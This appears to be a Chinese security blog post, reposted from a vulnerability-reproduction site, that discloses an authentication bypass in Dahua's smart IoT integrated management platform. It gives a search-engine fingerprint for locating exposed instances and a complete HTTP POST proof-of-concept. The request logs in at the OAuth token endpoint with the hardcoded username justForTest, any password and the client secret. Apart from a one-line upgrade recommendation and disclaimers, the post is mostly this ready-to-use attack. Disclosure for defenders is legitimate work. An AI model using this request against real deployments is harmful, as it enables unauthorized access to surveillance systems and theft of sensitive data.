2026-02-03 01:00:39 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文披露了大华智能物联综合管理平台存在的用户登录漏洞。攻击者可利用特定端点使用硬编码用户名justForTest配合任意密码绕过身份验证，造成敏感信息泄露。文章提供了资产测绘规则及漏洞复现POC，建议受影响用户尽快升级系统以修复该风险。 综合评分： 86 文章分类： 漏洞POC,漏洞分析,WEB安全

cover_image

大华智能物联综合管理平台justForTest用户登录漏洞附POC

原创

安服仔安服仔

北风漏洞复现文库

2026年2月2日 10:30 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

大华智能物联综合管理平台justForTest用户登录漏洞

—

影响版本

—

漏洞简介

大华智能物联综合管理平台是大华股份推出的一套集成化、智能化的综合管理软件，旨在为各类场景提供高效、灵活的物联管理解决方案。大华智能物联综合管理平台以模块化设计为核心，结合大华在安防领域的技术优势，为企业提供一站式智能物联管理服务，助力提升运营效率与安全性。大华智能物联综合管理平台的用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞，攻击者可使用用户名justForTest搭配任意密码登录系统，绕过身份验证，导致敏感信息泄露。

—

资产测绘

body="static/qwebchannel.js"&nbsp;&& body="/客户端会小于800/"

—

漏洞复现

POC

POST&nbsp;/evo-apigw/evo-oauth/oauth/token HTTP/1.1Host:&nbsp;127.0.0.1User-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;5.1) AppleWebKit/537.36&nbsp;(KHTML, like Gecko) Chrome/34.0.1866.237&nbsp;Safari/537.36Content-Length:&nbsp;109Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: closeusername=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=

—

修复建议

升级系统以修复漏洞

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库安服仔安服仔《大华智能物联综合管理平台justForTest用户登录漏洞附POC》